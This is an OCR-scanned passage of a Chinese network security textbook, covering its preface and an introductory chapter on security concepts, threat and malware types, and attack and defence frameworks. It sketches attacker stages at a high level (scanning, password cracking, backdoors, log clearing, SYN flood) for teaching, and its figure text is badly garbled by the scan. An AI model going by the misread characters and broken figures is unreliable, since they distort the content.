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《基于 案例 的 网 络 安全 技术 与 实践 》 涉 及 网 络 中 的 各 个 层次 ,犹如 血液 一 般 渗透 到 计算 
机 实际 应 用 过 程 中 的 各 个 环节 。 为 了 对 整体 有 一 个 清晰 的 把 握 , 通 常 可 以 把 计算 机 系统 划 
分 为 5 个 纵向 层次 : 硬件 材料 一 硬件 设计 与 实现 一 操作 系统 一 系统 软件 一 应 用 软件 ,类似 
地 ,网 络 安全 系统 也 可 以 分 成 一 个 5 层 体系 : 数学 基础 一 密码 学 一 安全 协议 一 网 络 安全 一 
应 用 安全 ,本 书 着 重 阐述 中 间 3 层 内 容 。 

本 教材 编写 的 出 发 点 主要 针对 3 种 "问题 "学 生 : 一 是 “高 分 低能 "型 ,其 核心 问题 是 “ 重 
知识 而 轻 能 力 ”; 二 是 “ 眼 高 手 低 ” 型 ,其 核心 问题 是 “ 知 其 然而 不 知 其 所 以 然 ” 三 是 “小 学 
生 ” 型 ,其 核心 问题 是 “无 兴趣 则 不 学 ” ,传统 教学 方法 无 效 。 

为 了 解决 上 述 问题 ,我 们 编写 了 基于 “兴趣 ”的 启发 式 网 络 工程 教材 :《 基 于 案例 的 网 络 安 
全 技术 与 实践 y》。 由 于 这 门 课程 的 特殊 性 (与 密码 和 安全 相关 的 有 趣 实例 非常 多 ), 可 以 基于 
“兴趣 ”进行 展开 ,每 章 都 可 以 从 一 个 趣味 益 然 的 实例 开始 曾 述 ,然后 进行 启发 式 的 讲解 ,一 环 
套 一 环 ,吸引 学 生 一 步 步 进入 教师 节奏 ,从 而 达到 良好 的 教学 效果 。 因 此 ,教材 每 一 章 编 写 的 
基本 思路 是 : 实例 (吸引 读者 ) 一 分析 (为 什么 这 样 做 ?7) 一 原理 (具体 怎么 做 ?) 习 实践 (实验 ) 一 
总 结 ( 形 成 体系 ) 一 习题 ( 银 炼 思维 ) ,其 中 ,习题 部 分 将 突出 批判 精神 ,引导 学 生 以 辩证 思维 
方式 看 问题 ,进而 将 学 生 培 养 成 为 能 够 善于 独立 思考 有 创造 力 的 复合 型 人 才 。 

此 外 ,本 书 还 具备 以 下 特点 : 

(1) 整体 的 连贯 性 。 本 书 整体 上 按照 网 络 安全 系统 从 低 到 高 的 层次 阐述 ,重点 针对 "“ 密 
码 学 一 安全 协议 一 网 络 安全 ”3 个 层次 进行 展开 , 且 前 者 都 是 作为 后 者 的 “ 黑 盒 "来 体现 ,使 
条 理 更 为 清晰 。“ 数 学 基础 ?部 分 只 给 出 简明 扼要 的 知识 点 ,而 “应 用 安全 ? 则 适度 的 分 布 在 
各 个 章节 以 及 实验 练习 中 。 

(2) 案例 的 趣味 性 。 本 书 图 文 并 茂 ,深入 浅 出 。 采 用 简单 有 趣 的 案例 来 说 明 其 实质 , 然 
后 再 将 问题 的 “计算 "或 “规模 "复杂 化 ,叙述 过 程 中 的 “对 比 ”"“ 流 程 "“ 交 互 ”等 问题 将 以 图 
表 的 形式 体现 。 同 时 抓 住 时 机 ,引出 知识 点 。 

(3) 知识 的 系统 性 。 本 书 最 终 目 的 是 培养 学 生 的 能 力 与 创造 力 , 因此 在 全 书 选 材 上 不 
仅 注意 理论 与 实际 的 结合 ,更 加 注重 对 兴趣 的 培养 ,在 基本 知识 掌握 的 基础 上 ,适当 给 出 当 
前 的 发 展 方向 ,从 而 培养 出 大 局 观 思 维 与 微 创 新 能 力 “ 双 强 ” 的 优秀 毕业 生 。 
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第 1 章 网 络 安全 概述 


如 果 把 一 封 信和 锁 在 保险 柜 中 ,把 保险 柜 藏 在 纽约 的 某 个 地 方 …*… 然后 告诉 你 去 看 
这 封 信 ,这 并 不 是 安全 ,而 是 隐藏 。 相 反 , 如 果 把 一 封 信人 锁 在 保险 柜 中 ,然后 把 保险 柜 及 
其 设计 规范 和 许多 同样 的 保险 柜 给 你 ,以 便 你 和 世界 上 最 好 的 开 保险 柜 的 专家 能 够 研 
究 锁 的 装置 ,而 你 还 是 无 法 打开 保险 柜 去 读 这 封 信 ,这 才 是 安全 的 概念 。 


一 Burce Schneier 


Internet 的 广泛 应 用 使 人 们 在 生产 方式 .生活 方式 及 思想 观念 等 方面 都 发 生 了 巨大 变 
化 ,推动 了 人 类 社会 的 发 展 和 人 类 文明 的 进步 ,把 人 类 带 人 办 新 的 信息 化 时 代 。 

计算 机 网 络 就 像 一 把 双 刃 剑 , 它 在 实现 了 信息 交流 与 共享 、 极 大 便利 和 丰富 了 社会 生活 
的 同时 ,由 于 网 络 本 身 的 脆弱 性 加 上 人 为 攻击 与 破坏 ,也 对 国家 安全 ,社会 公共 利益 以 及 公 
民 个 人 合法 权益 造成 现实 危害 和 潜在 威胁 。 因 此 ,加 强 对 信息 网 络 安全 技术 和 管理 的 研究 ， 
无 论 是 对 个 人 还 是 组 织 、 机 构 ,甚至 国家 、 政 府 都 有 非 同 寻常 的 重要 意义 。 


1.1 计算 机 网 络 安全 的 概念 


1.1.1 计算 机 网 络 安全 的 定义 


“安全 "一 词 在 字典 中 被 定义 为 “远离 危险 的 状态 或 特性 ”和 * 为 防范 间谍 活动 或 蕾 意 破 
坏 、 犯 罪 ,攻击 或 逃跑 而 采取 的 措施 ”。 从 这 个 角度 来 说 ,计算 机 网 络 安全 是 指 为 了 使 计算 机 
网 络 运行 正常 ,通过 采用 全 方位 的 管理 措施 和 强 有 力 的 技术 手段 ,保证 在 一 个 网 络 环境 里 ， 
使 得 经 过 计算 机 网 络 的 数据 保持 保密 性 、 完 整 性 和 可 用 性 。 

国际 标准 化 组 织 (ISO) 将 计算 机 安全 定义 为 “为 数据 处 理 系统 和 采取 的 技术 的 和 管理 
的 安全 保护 ,保护 计算 机 硬件 、 软 件数 据 不 因 偶然 的 或 恶意 的 原因 而 遭 到 破坏 、 更 改 、 显 
露 ”*。 美 国 国防 部 国家 计算 机 安全 中 心 将 计算 机 安全 定义 为 :“ 一 般 说 来 ,安全 的 系统 会 利 
用 一 些 专 门 的 安全 特性 来 控制 对 信息 的 访问 ,只 有 经 过 适当 授权 的 人 ,或 者 以 这 些 人 的 名 义 
进行 的 进程 可 以 读 、 写 、 创 建 和 删除 这 些 信息 ”。 我 国 公安 部 计算 机 管理 监察 司 将 计算 机 安 
全 定义 为 “计算 机 安全 是 指 计算 机 资产 安全 , 即 计 算 机 信息 系统 资源 和 信息 资源 不 受 自 然 和 
人 为 有 害 因素 的 威胁 和 和 危害”。 

上 面 是 狭义 的 计算 机 网 络 安全 的 内 容 。 广 义 上 讲 , 凡 是 涉及 网 络 上 信息 的 保密 性 、 完 整 
性 、 可 用 性 、 真 实 性 和 可 控 性 的 相关 技术 和 理论 都 是 网 络 信 息 安全 所 要 研究 的 领域 。 广 义 的 
计算 机 网 络 安全 还 应 该 包括 网 络 实体 安全 ,如 机 房 的 安全 保护 、 防 火 措施 防水 措施 .静电 防 
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护 、 电 源 系统 保护 等 。 图 1. 1 形象 地 表达 了 信息 安全 、 网 络 安全 以 及 信息 安全 管理 .策略 和 
计算 机 与 数据 安全 之 间 的 关系 。 


网 络 安全 


策略 。 计算 机 & 数 据 安全 
1.1 有 关 * 安 全 "在 不 同学 科 之 间 的 关系 


1.1.2 计算 机 网 络 安全 的 含义 


计算 机 网 络 安全 是 一 门 综合 性 学 科 ,涉及 计算 机 科学 .网络 技术 .通信 技术 .密码 与 认证 
技术 等 多 个 领域 的 知识 。 

1. 网 络 系统 安全 

网 络 系统 安全 是 信息 处 理 和 传输 系统 的 安全 ,包括 法 律 法 规 的 保护 ,计算 机 机 房 环境 的 
保护 ,计算 机 结构 设计 上 的 安全 ,硬件 系统 的 可 靠 、 安 全 运行 ,操作 系统 和 应 用 软件 的 安全 ， 
数据 库 系统 的 安全 等 。 这 方面 侧重 于 保护 系统 正常 的 运行 ,本 质 是 保护 系统 的 合法 操作 和 
正常 运行 。 

2， 系统 信息 安全 

系统 信息 安全 包括 用 户口 令 鉴 别 、 用 户 存 取 权 限 控制 .数据 存 取 权限 控制 ,安全 审计 、 计 
算 机 病毒 防治 数据 加 密 等 。 

3. 信息 内 容 安全 

信息 内 容 安全 包括 保护 信息 的 保密 性 、 真 实 性 和 完整 性 。 和 避免 攻击 者 利用 系统 的 安全 
漏洞 进行 窃听 假冒 .诈骗 等 行为 ,保护 用 户 的 利益 和 隐私 。 

4. 信息 传播 安全 

信息 传播 防止 和 控制 非法 有 害 信 息 传播 产生 的 后 果 , 维 护 道德 法律 和 国家 的 利益 , 包 
括 不 良 信息 的 过 滤 等 。 

计算 机 网 络 安全 的 本 质 含义 是 计算 机 网 络 上 的 信息 安全 。 但 其 具体 含义 是 随 着 对 象 的 
不 同 而 不 断 变化 ,在 不 同 的 环境 会 有 不 同 的 解释 。 如 果 网 络 的 对 象 是 网 络 用 户 ,计算 机 网 络 
的 含义 是 保证 用 户 所 传输 信息 的 保密 性 、 真 实 性 和 完整 性 ; 如 果 网 络 的 对 象 是 网 络 管理 者 ， 
计算 机 网 络 的 含义 是 对 接 入 网 络 的 权限 加 以 控制 ,并 规定 每 个 用 户 的 接 入 权限 ; 如 果 网 络 
的 对 象 是 安全 保密 部 门 ,计算 机 网 络 的 含义 是 保证 国防 等 国家 机 密 信息 的 保密 性 ,保卫 国家 
安全 ,维护 国家 利益 。 如 果 网 络 的 对 象 是 社会 教育 相关 部 门 ,计算机 网 络 的 含义 是 保证 网 络 
上 的 内 容 健 康 , 对 社会 的 稳定 起 到 积极 作用 。 


1.2 计算 机 网 络 安全 的 攻击 与 防御 


1.2.1 潜伏 者 一 一 谁 是 主要 威胁 

1. 网 络 实体 威胁 

网 络 实体 包括 网 络 设 备 及 其 设备 上 运行 的 网 络 软 件 , 网 络 实体 所 受到 的 威胁 主要 有 以 
下 4 个 方面 。 

(1) 自然 因素 的 威胁 。 分 为 自然 灾害 (如 和 雷电、 地 震 、 水 灾 、 火 灾 等 ) 物理 损 坏 ( 如 网 络 
设备 损坏 \ 硬 盘 物 理 损 坏 等 ) 和 设备 故障 (如 意外 断 电 、 电 磁 干 扰 等 )3 个 方面 。 特 点 是 自然 
因素 性 、 突 发 性 和 非 针 对 性 。 这 种 威胁 破坏 信息 的 完整 性 和 可 用 性 (无 损 信息 的 保密 性 )。 
该 种 威胁 的 防范 一 般 是 实施 防护 措施 ,建立 数据 备份 和 安全 制度 。 

(2) 电磁 泄漏 (如 监听 计算 机 操作 过 程 ) 产 生 信 息 泄露 ` 受 电磁 干扰 和 痕迹 泄露 等 威胁 。 
特点 是 难以 觉察 性 、 人 为 实施 的 故意 性 、 信 息 的 无 意 泄漏 性 。 这 种 威胁 破坏 信息 的 保密 性 
(无 损 信 息 的 完整 性 和 可 用 性 )。 对 这 种 威胁 的 防范 一 般 是 实施 辐射 防护 .加密 和 隐藏 销毁 。 

(3) 操作 失误 (如 删除 文件 .格式 化 硬盘 等 ) 和 意外 事故 (如 系统 崩溃 等 ) 的 威胁 。 特 点 
是 人 为 实施 的 无 意 性 和 非 针 对 性 。 这 种 威胁 破坏 信息 的 完整 性 和 可 用 性 (无 损 信 息 的 保密 
性 )。 对 这 种 威胁 的 防范 一 般 是 采用 状态 检测 .报警 确认 和 应 急 恢复 等 方法 。 

(4) 计算 机 网 络 机 房 的 环境 威胁 。 特 点 是 损失 大 、 可 控 性 强 、 可 管理 性 强 。 这 种 威胁 对 
信息 的 完整 性 、 可 用 性 和 保密 性 都 可 能 产生 影响 。 这 种 威胁 的 解决 方法 是 加 强 机 房管 理 、 运 
行 管理 ,安全 组 织 和 人 员 管 理 。 

网 路 实体 安全 是 信息 安全 的 最 根本 保障 ,是 不 可 或 缺 的 组 成 部 分 。 网 络 系统 中 的 硬件 
和 软件 在 设计 时 考虑 到 所 承受 的 安全 威胁 ,采取 相应 的 措施 。 同 时 ,通过 安全 意识 的 提高 、 
安全 制度 的 完善 ,安全 操作 的 保证 等 方式 使 得 操作 人 员 和 管理 人 员 在 网 络 实体 安全 方面 达 
到 要 求 。 

2. 网 络 系统 威胁 

网 络 系统 威胁 主要 有 两 个 方面 : 网 络 存 储 威胁 和 网 络 传 输 威胁 。 

网 络 存 储 威胁 是 指 信息 在 网 络 节点 上 静态 存放 状态 下 受到 的 威胁 ,主要 是 网 络 内 部 或 
外 部 对 信息 的 非法 访问 。 

网 络 传输 威胁 是 指 信息 在 动态 传输 过 程 中 受到 的 威胁 ,主要 有 以 下 几 种 威胁 。 

(1) 截获 (interception) : 攻击 者 从 网 络 上 窃听 他 人 的 通信 内 容 。 

(2) 中 断 (interruption) : 攻击 者 有 意 中 断 他 人 在 网 络 上 的 通信 。 

(3) 算 改 (modification): 攻击 者 故意 算 改 网 络 上 传送 的 报 文 。 

(4) 伪造 (fabrication) : 攻击 者 伪造 信息 在 网 络 上 传送 。 

截获 信息 的 攻击 称 为 被 动 攻击 ,而 中 断 、 自 改 和 伪造 这 种 更 改 信息 和 拒绝 用 户 使 用 资源 
的 攻击 称 为 主动 攻击 。 被 动 攻击 和 主动 攻击 的 情况 如 图 1. 2 所 示 。 

在 被 动 攻击 中 ,攻击 者 只 是 观察 和 分 析 某 一 个 协议 数据 单元 而 不 干扰 信息 流 。 主 动 攻 
击 是 指 攻 击 者 对 某 个 连接 中 通过 的 协议 数据 单元 进行 各 种 处 理 。 主 动 攻击 又 可 以 进一步 划 
分 为 3 种 : 拒绝 服务 .更改 报 文 流 和 伪造 连接 初始 化 。 
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1.2 被动 攻击 与 主动 攻击 


几 各 二 辣 过 富 


拒绝 服务 是 指 采用 某 种 方法 (如 ,攻击 者 向 因特网 上 的 服务 器 不 停 地 发 送 大 量 分 组 , 消 
耗 系统 资源 ; 或 修改 服务 器 中 的 认证 信息 ,使 合法 用 户 无 法 通过 认证 ) 使 得 因特网 或 服务 器 
无 法 提供 正常 服务 。 更 改 报 文 流 包括 对 通过 连接 的 协议 数据 单元 的 真实 性 、 完 整 性 和 有 序 
性 的 攻击 。 伪 造 连接 初始 化 是 攻击 者 重 放 以 前 已 经 被 记录 的 合法 连接 初始 化 序列 ,或 者 伪 
造 身 份 而 企图 建立 连接 。 

对 付 被 动 攻击 可 采用 各 种 数据 加 密 技 术 ,而 对 付 主 动 攻击 , 则 需要 将 加 密 技 术 与 适当 的 
认证 技术 相 结合 。 

3. 恶意 程序 威胁 

有 一 种 特殊 的 主动 攻击 是 恶意 程序 (Rogue Program) 的 攻击 。 恶 意 程序 对 网 络 安全 威 
胁 较 大 的 主要 有 以 下 几 种 。 

(1) 计算 机 病毒 (Computer Virus)。 病 毒 是 附着 于 程序 或 文件 中 的 一 段 计算 机 代码 ， 
它 可 以 在 计算 机 之 间 传 播 , 通 过 修改 其 他 程序 来 把 自身 或 其 变种 复制 进去 。 计 算 机 病毒 一 
边 传 播 一 边 感 染 计 算 机 ,可 破坏 硬件 、 软 件 和 文件 。 例 如 ,从 1999 年 的 “ 梅 莉 莎 ”病毒 、 
“CIH” 病 毒 及 2000 年 的 “ 爱 虫 "病毒 到 2001 年 的 “欢乐 时 光 " 病 毒 ,计算 机 病毒 纷纷 利用 计 
算 机 网 络 作为 自己 繁殖 和 传播 的 载体 及 工具 ,呈现 出 愈演愈烈 的 势头 ,造成 的 危害 也 越 来 
越 大 。 

(2) 计算 机 蠕虫 (Computer Worm)。 通 过 网 络 的 通信 功能 将 自身 从 一 个 节点 发 送 到 另 
一 个 节点 并 启动 运行 的 程序 。 例 如 ,蠕虫 可 以 向 电子 邮件 地 址 短 中 的 所 有 联系 人 发 送 自己 
的 副本 ,那些 联系 人 的 计算 机 也 将 执行 类 似 的 操作 ,结果 使 得 整个 Internet 的 速度 减 慢 。 

(3) 特洛伊 木马 (Trojan Horse) 。 一 种 程序 , 它 执 行 的 功能 超出 所 声称 的 功能 ,该 功能 
被 用 户 在 不 知情 的 情况 下 使 用 。 例 如 ,一 个 编译 程序 除了 执行 编译 任务 以 外 ,还 把 用 户 的 源 
程序 偷偷 地 拷贝 一 份 , 这 种 编译 程序 就 是 一 种 特洛伊 木马 。 

(4) 逻辑 炸弹 (Logic Bomb)。 一 种 当 运行 环境 满足 某 种 特定 条 件 时 执行 其 他 特殊 功能 
的 程序 。 例 如 ,一 个 编辑 程序 ,平时 运行 得 很 好 ,但 当 系统 时 间 为 13 日 又 为 星期 五 时 , 它 会 
删除 系统 中 的 所 有 文件 ,这 种 程序 就 是 一 种 逻辑 炸弹 。 


1.2.2 层次 化 网 络 安 全 的 核心 问题 


1. 互 连 层 次 

针对 网 络 群体 网 络 是 否 安全 。 

要 素 : 完整 性 、 网 络 监控 .通信 、 隔 离 连通 。 

核心 问题 : 网 络 能 否 得 到 监控 ? 是 否 任何 一 个 IP 地 址 都 能 进入 网 络 ? 隔离 和 连通 的 


程度 如 何 ? 采用 何 种 互 连 设备 和 技术 ? 网 络 设备 能 否 监视 和 控制 ? 新 加 入 的 网 段 是否 能 自 
动 监测 ?无 线 与 移动 在 接 人 上 的 问题 等 。 

2. 系统 层次 

针对 系统 群体 操作 系统 是 否 安全 。 

要 素 : 病毒 .黑客 风险、 审计 分 析 。 

核心 问题 : 谁 来 监视 超级 用 户 和 管理 员 恶 意 程序 (病毒 ) 对 网 络 的 威胁 ; 黑客 攻击 与 人 
侵 ; 网 络 整体 与 局 部 站 点 自身 安全 ; 操作 系统 .数据 库 安全 问题 ; 入侵 检测 、 防 御 ; 安全 风 
险 评 估 、 安 全 审计 分 析 等 。 

3. 管理 层次 

针对 用 户 群 体 用 户 是 否 安全 。 

要 素 : 配置 ,用户 / 组 管理 ,用户 鉴 别 。 

核心 问题 : 是 否 只 允许 授权 用 户 使 用 系统 资源 和 数据 ? 谁 能 够 进入 系统 和 网 络 ? 谁 能 
够 得 到 和 修改 安全 配置 ? 用 户 组 管理 、 系 统 登 录 控制 ; 用 户 身份 认证 ; 用 户 间 是 否 彼 此 信 
任 等 。 

4. 应 用 层次 

针对 应 用 群体 应 用 程序 是 否 安全 。 

要 素 : 访问 控制 ,授权 、 软 件 保 护 。 

核心 问题 : 是 否 只 有 合法 用 户 才 能 对 特定 数据 进行 合法 的 操作 ? 用 户 对 资源 .数据 获 
取 和 使 用 的 权限 ; 必须 考虑 权限 的 控制 和 授权 (寻找 平衡 点 ); 应 用 程序 对 数据 的 合法 权 
限 ; 应 用 程序 对 用 户 的 合法 权限 等 。 

5. 数据 层次 

针对 应 用 保密 数据 是 否 安全 。 

要 素 : 加 密 、 存 储 、 传 输 。 

核心 问题 : 机 密 数 据 是 否 处 于 机 密 状 态 ? 主要 解决 数据 的 机 密 性 ; 数据 加 /解密 、 编 码 
和 解码 的 可 信和 度 ; 数据 校 验 和 容错 ; 数据 备份 ; 系统 与 数据 恢复 ; 数据 内 容 安全 等 。 


1.2.3 网 络 安全 的 攻防 体系 


从 过 程 的 角度 来 看 ,任何 一 次 网 络 攻击 都 是 连接 攻击 者 和 最 终 目 的 的 操作 序列 ,攻击 者 
选用 合适 的 工具 ,侵入 目标 系统 实施 攻击 ,得 到 一 定 的 结果 ,最 终 达 到 目的 ,因此 ,形成 网 络 
攻击 的 5 个 组 成 部 分 ,如 图 1. 3 所 示 。 

1. 攻击 技术 

如 果 不 知道 如 何 攻击 ,再 好 的 防守 也 是 经 不 住 考验 的 ,攻击 技术 主要 包括 5 个 方面 。 

网 络 监 听 : 自己 不 主动 去 攻击 别人 ,在 计算 机 上 设置 一 个 程序 去 监听 目标 计算 机 与 其 
他 计算 机 通信 的 数据 。 

网 络 扫 描 : 利用 程序 去 扫描 目标 计算 机 开放 的 端口 等 ,目的 是 发 现 漏洞 ,为 人 侵 该 计算 
机 做 准备 。 

网 络 入 侵 : 当 探 测 发 现 对 方 存 在 漏洞 以 后 ,入 侵 到 目标 计算 机 获取 信息 。 

网 络 后 门 : 成 功 和 人 侵 目 标 计算 机 后 ,为 了 对 “战利品 ”的 长 期 控制 ,在 目标 计算 机 中 种 植 
木马 等 后 门 。 
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网 络 攻击 
[i [| [坊间 | | 各 大 | [BB 标 
仿 骇 客 信用 户 命令 | - 
今 间谍 仿 脚 本 和 程序 今 挑战 状态 
今 恐 怖 主义 者 | 今 自主 式 代理 汽 信息 今 政治 收益 
仿 公 司 今 工具 包 今 窃取 服务 | | 仿 金 融 收益 
仿 职 业 罪 犯 “| 今 分 布 式 工具 仿 剥 村 服务 | | 令 损 伤 
今 故意 破坏 “| 仿 数 据 窃听 
所 利用 的 弱点 类 型 | | 入 侵 级 别 | 过 程 | | 访问 的 主体 

令 设 计 今 访问 “|| 今 特定 型 | 惟 文 件 

今 实施 今 使 用 依 传 输 的 数据 

今 配置 


1.3 网 络 攻击 总 体 框架 


网 络 隐身 : 人 侵 完 毕 退 出 目标 计算 机 后 ,将 自己 入 侵 的 痕迹 清除 ,从 而 防止 被 对 方 管理 
员 发 现 。 

攻击 者 一 般 拥有 的 思想 是 : 安全 是 一 条 链 ,其 可 靠 性 程度 取决 于 链 中 最 薄弱 的 环节 ; 
人 ,技术 ,管理 都 有 “ 注 弱 ”环节 。 因 此 ,攻击 技术 的 一 般 流程 如 图 1.4 所 示 。 


功 访问 目标 


信息 进一步 押 取 ， 确 定 可 
信 系 统 的 入 侵 机 制 和 途径 


目标 地 址 范围 确定 、 名 字 | 「 可 贞 打开 源 查 询 ，whois ;whois 的 Web 接 口 ;ARIN whois; 
空间 查询 和 DNA 区 域 传送 
半 晤 村 对 统 向 风 丰 和 评估 | | 拉 失 Ping sweep，TCPJUDP 端 口 扫描 ;OS 检测 
T 

针对 有 效用 户 账号 或 共享 | [「 坦 点 列 出 用 户 账号 ; 列 出 共享 文件 ; 确定 各 种 应 用 

源 ， 进 行 更 多 入侵 探 询 | 一 ~ 
设 必 这 亲王 多 人 全 近 加 窗 码 六 听 ; 共享 文件 的 蛮 力 攻 市 ， 殷 取 密码 ; 文件 组 
收集 足够 的 信息 ， 得 以 成 | 成 功 访问 冲 区 溢出 


从 对 用 户 级 的 访问 权限 到 | 提升 密码 破解 ;利用 已 知 漏洞 和 脆弱 点 
对 系统 的 完全 控制 


一 旦 目标 系统 已 全 部 控 
制 ， 掩 踪 灭 迹 


掩 踪 灭 迹 


不 同 部 位 布置 陷阱 和 后 


评估 可 信 系统 的 坚固 度 ; 搜索 明文 密码 


清除 日 志 记录 ; 掩藏 工具 


创建 “无 赖 * 账 号; 安排 批 处 理 作 业 ; 感染 初 启 文件 ; 
置 入 远程 控制 程序 ; 安装 监控 机 制 ; 利用 特洛伊 木马 蔡 换 


门 ， 需 要 时 获得 特权 访问 


创建 后 门 


如 果 入 侵 不 成 功 ， 可 用 漏 
洞 代码 来 使 目标 系统 瘫痪 


2. 防御 技术 


拒绝 服务 


SYN flood ; ICMP 技 术 ; 同一 src/dst SYN 请 求 ; 重 一 
fragment/offset 错 误 (bugs) ; Out of bounds TCP options 


(OOB): DDoS 


1.4 攻击 技术 的 一 般 流程 


防御 技术 包括 5 大 方面 : 
操作 系统 的 安全 配置 一 一 操作 系统 的 安全 是 整个 网 络 安全 的 关键 。 


加 密 技 术 一 一 为 了 防止 被 监听 和 盗 取 数据 ,将 所 有 的 数据 进行 加 密 。 

防火 墙 技术 一 一 利用 防火 墙 ,对 传输 的 数据 进行 限制 ,从 而 防止 被 入 侵 。 

入 侵 检测 一 一 如 果 网 络 防 线 最 终 被 攻破 了 ,需要 及 时 发 出 被 入 侵 的 警报 。 

主动 防御 一 一 只 有 授权 的 应 用 或 服务 才 可 能 运行 ,其 他 一 概 拒绝 ,主要 针对 未 知 威胁 。 

防御 者 一 般 拥有 的 思想 是 : 用 兵 之 法 ,无 忧 其 不 来 , 情 吾 有 以 待 也 ,无 情 其 不 攻 , 导 吉 有 
所 不 可 攻 也 。 

3. 攻防 交互 

如 图 1.5 所 示 , 通 常安 全 系统 有 3 个 独立 的 重要 组 成 部 分 : 硬件 (hardware)、 软 件 
(software) 数据 (data) 。 

脆弱 点 (vulnerability) : 安全 系统 中 的 缺陷 ,如 过 程 , 设 计 或 实现 中 的 缺陷 ,能 被 攻击 者 
所 利用 来 进行 破坏 活动 。 

威胁 (threat) : 能 潜在 引起 系统 损失 和 伤害 的 一 些 环境 。 

控制 (control) : 是 一 些 动作 、 装 置 ,程序 或 技术 , 它 能 消除 或 减少 脆弱 点 。 

攻击 者 可 以 利用 系统 的 脆弱 点 对 系统 进行 攻击 ,而 防御 者 则 尽量 采用 控制 脆弱 点 的 方 
式 抵御 攻击 。 

一 些 攻防 技术 如 图 1.6 所 示 。 


脆弱 点 
威胁 vulnerability 


threat 


图 1.5 攻防 交互 模拟 图 1.6 攻防 技术 举例 


总 之 ,现代 系统 有 太 多 的 组 件 和 连接 ,其 中 一 些 甚至 连 系 统 的 设计 者 、 实 现 者 和 使 用 者 
都 不 知道 。 因 此 ,不 安全 因素 总 是 存在 。 没 有 一 个 系统 是 完美 的 ,没有 一 项 技术 是 灵 丹 
妙药 。 


1.2.4 影响 网 络 安 全 的 因素 


影响 网 络 安全 的 因素 有 很 多 ,总 体 来 说 影响 网 络 安全 的 因素 主要 有 以 下 3 个 方面 。 

1. 自然 因素 

(1) 自然 灾害 的 影响 。 水 灾 、 火 灾 、 地 震 、 雷 电 等 自然 灾害 往往 给 系统 造成 难以 恢复 的 
破坏 ,有 的 会 损害 系统 设备 ,有 的 则 会 破坏 数据 ,甚至 毁 掉 整个 系统 和 数据 。 

(2) 环境 的 影响 。 计 算 机 设备 本 身 能 够 产生 电磁 辐射 ,也 怕 外 界 电磁 波 的 辐射 和 干扰 ， 
自身 辐射 带 有 信息 ,容易 被 别人 接收 ,造成 信息 泄漏 。 此 外 ,静电 、 灰 尘 , 有 害 气 体 等 也 有 可 
能 给 系统 带 来 破坏 。 

(3) 辅助 保障 系统 的 影响 。 辅 助 保障 系统 ,如 水 、 电 、 空 调 工 作 中 断 或 工作 不 正常 会 影 
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大 于 案例 的 网 络 安 会 技术 与 实践 


2. 技术 因素 

(1) 网 络 硬件 存在 安全 方面 的 缺陷 。 如 计算 机 的 可 靠 性 差 , 计 算 机 的 许多 核心 技术 不 
过 关 , 其 关键 的 安全 性 参数 是 否 有 误 还 需 经 过 检验 。 

(2) 网 络 软 件 存 在 的 安全 漏洞 。 任 何 软 件 系 统 ,包括 系统 软件 和 应 用 软件 ,都 无 法 避免 
安全 漏洞 的 存在 。 目 前 流行 的 许多 操作 系统 、 浏 览 器 等 均 存在 网 络 安全 漏洞 ,还 有 一 些 常 用 
软件 本 身 的 漏洞 等 。 几 乎 所 有 的 病毒 都 是 借助 于 系统 或 软件 的 漏洞 进行 攻击 和 传播 的 。 

(3) 系统 配置 不 当 造成 的 其 他 安全 漏洞 ,如 在 网 络 中 路 由 器 配置 错误 .口令 文件 缺乏 安 
全 的 保护 、 命 令 的 不 合理 使 用 等 ,都 会 带 来 或 多 或 少 的 安全 漏洞 。 黑 客 大 多 都 是 利用 这 些 漏 
洞 攻击 网 络 ,比如 IP 地 址 标识 可 以 被 其 他 用 户 窥探 到 ,这 为 假冒 身份 提供 了 方便 。 

3. 人 为 因素 

1) 人 为 无 意 失误 

软件 开发 过 程 中 可 能 留 下 的 缺陷 或 逻辑 错误 ,这些 漏洞 和 逻辑 错误 就 是 黑客 进行 网 络 
攻击 的 首选 途径 ,从 而 导致 网 络 信息 的 严重 破坏 。 网 络 管理 者 在 管理 网 络 的 过 程 中 ,如 果 安 
全 配置 不 正确 可 能 造成 网 络 的 安全 漏洞 ; 如 果 资 源 的 访问 控制 设 定 不 合理 则 可 能 导致 一 些 
资源 被 破坏 。 比 如 用 户 安全 意识 不 强 .口令 选择 不 慎 . 用 户 将 自己 的 账号 转借 他 人 等 都 会 对 
网 络 安全 带 来 威胁 。 

2) 人 为 恶意 攻击 

人 为 恶意 攻击 课 对 计算 机 网 络 造成 极 大 的 危害 ,分 为 非 破坏 性 攻击 和 破坏 性 攻击 。 非 
破坏 性 攻击 威胁 信息 的 保密 性 ,在 不 影响 网 络 正常 工作 的 情况 下 对 重要 的 机 密 信息 进行 截 
获 等 。 破 坏 性 攻击 威胁 信息 的 可 用 性 和 完整 性 ,对 他 人 相关 信息 进行 中 断 和 算 改 ,对 有 利于 
自己 的 信息 进行 伪造 等 。 

对 网 络 进行 恶意 攻击 的 人 员 包 括 心 存 不 满 的 员工 、 软 硬件 测试 人 员 、 网 络 技术 爱好 者 、 
好 奇 的 年 轻 人 、 骇 客 (Cracker) 以 政治 或 经 济 利益 为 目的 的 间谍 等 。 来 自 内 部 用 户 的 安全 
威胁 远大 于 外 部 网 用 户 的 安全 威胁 。 


1.3 计算 机 网 络 安全 的 宏观 层次 


计算 机 网 络 安全 的 实质 就 是 安全 立法 ,安全 技术 和 安全 管理 的 综合 实施 ,从 这 3 个 层次 
分 别 对 安全 策略 进行 限制 监视 和 保障 。 


1.3.1 安全 立法 


法 律 是 规范 人 们 一 般 社会 行为 的 准则 。 法 律 从 形式 上 分 为 宪法 .法律 ,法规 、 法 令 、 条 
令 .条 例 和 实施 办 法 、 实 施 细则 等 ,从 内 容 上 分 为 社会 规范 和 技术 规范 。 

计算 机 网 络 时 代 向 传统 法 律 提 出 了 许多 前 所 未 有 的 挑战 ,健全 的 安全 法 律 法 规 体 系 是 
确保 信息 安全 的 基础 ,不 论 是 国外 还 是 国内 ,以 法 律 的 形式 规定 和 规范 信息 安全 工作 都 是 有 
效 实施 安全 措施 的 有 力 保证 。 

1. 安全 立法 的 内 容 

安全 立法 包括 3 个 方面 的 内 容 : 


(1) 公法 。 公 法 的 内 容 应 包括 对 网 络 进行 管理 的 行政 法 内 容 , 对 网 络 纠纷 进行 裁决 的 
诉讼 法 内 容 , 对 网 络 犯 罪行 为 追究 的 刑法 、 形 式 诉讼 法 的 内 容 。 

(2) 私法 。 私 法 是 从 民法 的 角度 ,对 网 络 主体 及 其 权利 义务 、 网 络 行为 .网 络 违法 行为 
